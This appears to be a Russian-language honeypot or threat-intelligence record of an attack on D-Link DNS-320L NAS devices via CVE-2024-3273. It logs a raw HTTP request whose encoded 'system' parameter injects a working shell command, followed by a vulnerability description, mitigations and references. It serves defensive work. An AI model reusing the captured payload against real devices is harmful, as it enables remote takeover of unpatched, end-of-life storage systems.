Информация об атаке

Tag
 
CVE-2024-3273
Date
 
2024-07-17
Client IP
 
192.227.190.158
Client GEO
 
united states
Vendor
 
D-Link
Product
 
DNS-320L
RAW request
 
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=ZWNobwktZQlcXHg2ZFxceDc2XFx4MjBcXHgyZlxceDc2XFx4NjFcXHg3MlxceDJmXFx4NzdcXHg3N1xceDc3XFx4MmZcXHg2M1xceDY3XFx4NjlcXHgyZFxceDYyXFx4NjlcXHg2ZVxceDJmXFx4NmVcXHg2MVxceDczXFx4NWZcXHg3M1xceDY4XFx4NjFcXHg3MlxceDY5XFx4NmVcXHg2N1xceDJlXFx4NjNcXHg2N1xceDY5XFx4MjBcXHgyZlxceDc2XFx4NjFcXHg3MlxceDJmXFx4NzdcXHg3N1xceDc3XFx4MmZcXHg2M1xceDY3XFx4NjlcXHgyZFxceDYyXFx4NjlcXHg2ZVxceDJmXFx4NzRcXHg3MlxceDc1XFx4NmRcXHg3MFxceDJlXFx4NjNcXHg2N1xceDY5XFx4M2JcXHg2Y1xceDczfHNo HTTP/1.0
User-Agent: Go-http-client/1.1
Host: ████████████
X-Forwarded-For: ███████████████
Accept-Encoding: gzip
Connection: close
Description
 
CVE-2024-3273 - это критическая уязвимость командной инъекции, затрагивающая устройства NAS от D-Link, в частности модели DNS-320L, DNS-325, DNS-327L и DNS-340L, с прошивкой до версии от 3 апреля 2024 года. Уязвимость находится в компоненте HTTP GET Request Handler, а именно в файле /cgi-bin/nas_sharing.cgi. Манипулируя аргументом 'system', злоумышленник может внедрять и выполнять произвольные команды на устройстве. Атака может быть запущена удаленно и не требует предварительной аутентификации, что делает её крайне эксплуатируемой. Уязвимость активно эксплуатируется в дикой природе, и более 90 000 устройств могут быть затронуты. Эксплойт был публично раскрыт, и доступен код доказательства концепции. Критичность этой уязвимости подчеркивается её оценкой CVSS в 9.8. Важно отметить, что эти устройства больше не поддерживаются D-Link, так как достигли статуса конца жизненного цикла (EOL) или конца обслуживания (EOS). Таким образом, официальные патчи или обновления для устранения этой проблемы предоставлены не будут.
Mitigations
 
    

  1. Вывод из эксплуатации и замена: Поскольку затронутые устройства устарели и больше не поддерживаются, основная рекомендация - вывести их из эксплуатации и заменить на новые, поддерживаемые модели.
    2. 

  2. Сегментация сети: Изолируйте затронутые устройства NAS от остальной сети, чтобы минимизировать потенциальную эксплуатацию.
    3. 

  3. Правила межсетевого экрана: Реализуйте строгие правила межсетевого экрана для блокировки доступа к уязвимым конечным точкам из недоверенных сетей.
    4. 

  4. Мониторинг и реагирование: Постоянно мониторьте сетевой трафик на предмет признаков эксплуатации и оперативно реагируйте на любую подозрительную активность.
    5. 

  5. Отключение ненужных сервисов: Отключите все ненужные сервисы на устройствах NAS, чтобы уменьшить поверхность атаки.
    6. 

  6. Консультация с производителем: Проконсультируйтесь с D-Link или специалистом по кибербезопасности для получения дальнейших рекомендаций и возможных альтернативных решений.
    7.
Links
https://censys.com/cve-2024-3272-and-2024-3273/
https://censys.com/cve-2024-3273/
https://github.com/Chocapikk/CVE-2024-3273
https://github.com/adhikara13/CVE-2024-3273
https://nvd.nist.gov/vuln/detail/CVE-2024-3273
https://tehtris.com/en/blog/honeypots-focus-on-cve-2024-3273/
https://thehackernews.com/2024/04/critical-flaws-leave-92000-d-link-nas.html
https://www.bleepingcomputer.com/news/security/over-92-000-exposed-d-link-nas-devices-have-a-backdoor-account/
https://www.cvedetails.com/cve/CVE-2024-3273/
https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild
https://www.helpnetsecurity.com/2024/04/08/cve-2024-3273/
https://www.securityweek.com/exploitation-attempts-target-unpatched-flaw-affecting-many-d-link-nas-devices/
https://www.stormshield.com/news/security-alert-d-link-cve-2024-3272-cve-2024-3273-stormshields-product-response/
https://www.tenable.com/cve/CVE-2024-3273